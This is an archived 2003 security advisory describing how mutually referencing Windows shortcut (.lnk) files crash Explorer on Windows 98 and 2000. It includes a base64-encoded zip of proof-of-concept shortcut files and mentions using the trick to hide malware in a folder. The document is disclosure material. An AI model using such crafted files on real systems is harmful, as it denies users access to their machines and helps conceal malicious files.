Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: a6068.htm

Windows explorer DoS with cross-referenced shortcuts (link(a) <-> link(b))



16th Mar 2003 [SBWID-6068]
COMMAND

	Windows explorer DoS with  cross-referenced  shortcuts  (link(a)  <->
	link(b))

SYSTEMS AFFECTED

	Tested With: Windows 98, Windows 2000 Server

PROBLEM

	S.G.Masood [sgmasood@yahoo.com] found :
	
	There is a problem with the way Windows (tested  with  Win98  and  Win2k
	Server) handles shortcut (.lnk) files.
	
	A specially crafted shortcut will crash explorer.exe/shell32.dll.
	
	A shortcut, say, A.lnk is created and it is made  to  point  to  another
	shortcut B.lnk. Then, B.lnk is made to point  to  A.lnk.  Now  when  the
	folder containing these two files is viewed  or  accessed  in  any  way,
	explorer crashes.
	
	(Note that Windows won't allow the creation of .lnk files in  the  above
	format. A hex editor can be used to change  the  location  of  the  .lnk
	files. A zip file containing examples for Win98 has been attached)
	
	As an effect, a malicious user/program can  hide  malware  in  a  folder
	containing   these   .lnk   files   to   prevent   users/programs   from
	investigating the contents of the folder.
	
	This vulnerability is most damaging when the  shortcuts  are  placed  on
	the desktop. This could prevent many clueless  users  from  using  their
	computer.
	
	--snap--
	
	
	--0-2099707853-1047734379=:38066
	Content-Type: application/x-zip-compressed; name="test.zip"
	Content-Transfer-Encoding: base64
	Content-Description: test.zip
	Content-Disposition: attachment; filename="test.zip"
	
	UEsDBBQAAAAIAFcibC5Lkat2pgAAAAUBAAAKAAAAdGVzdC9hLmxua/NhYGBg
	FGFiAIEDYJLBTRpIKID4tqulFV4cYmRoibX88xxIO1+WAfOhAM6AgkQGEQZ5
	/gf+FxReWWUKLLrBwaBtYDBXkkHZ2SqGAR0YtkgwGIJZ2XoXtgowlKQWlzCE
	uAaHMEgxGEHFb29VYEjSy8nLhpIMDA5ALMMAsRpEG0INswcSokDMDMS3OYvk
	BIB0kGOUJwPQapDJMVAD2Bn0IEx2mAzIVQBQSwMEFAAAAAgAZiJsLgcknDqp
	AAAABQEAAAoAAAB0ZXN0L2IubG5r82FgYGAUYWIAgQNgksFNGkgogPi2q6UV
	XhxiZGiJtfzzHEg7X5YB86EAzoCCRAYRBnn+B/4XFF5ZZQosusHBoG1gMFeS
	QdnZKoYBHRi2SDAYglnZehe2CjCUpBaXMIS4BocwSDEYQcVvb1VgSNTLyctm
	cASTDAwOQCzDALEaRBtCDbMHEqJAzAzEtzmL5ASAdJBjlCcD0GqQyTEQYxjY
	GfQgTHaYDMhVAFBLAwQKAAAAAACRImwuTrd9xEIAAABCAAAADwAAAHRlc3Qv
	cmVhZG1lLnR4dDEuIFVuemlwIHRvIEM6XA0KMi4gT3BlbiB0aGUgZm9sZGVy
	IGM6XHRlc3QNCg0KVGVzdGVkIHdpdGggV2luOTgNClBLAwQKAAAAAAAQImwu
	AAAAAAAAAAAAAAAABQAAAHRlc3QvUEsBAhQAFAAAAAgAVyJsLkuRq3amAAAA
	BQEAAAoAAAAAAAAAAAAgALaBAAAAAHRlc3QvYS5sbmtQSwECFAAUAAAACABm
	ImwuByScOqkAAAAFAQAACgAAAAAAAAAAACAAtoHOAAAAdGVzdC9iLmxua1BL
	AQIUAAoAAAAAAJEibC5Ot33EQgAAAEIAAAAPAAAAAAAAAAEAIAC2gZ8BAAB0
	ZXN0L3JlYWRtZS50eHRQSwECFAAKAAAAAAAQImwuAAAAAAAAAAAAAAAABQAA
	AAAAAAAAABAA/0EOAgAAdGVzdC9QSwUGAAAAAAQABADgAAAAMQIAAAAA
	
	--0-2099707853-1047734379=:38066--
	

SOLUTION

	No patch is availaible from the vendor.  The  shortcuts  can  be  safely
	deleted from the commandline.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH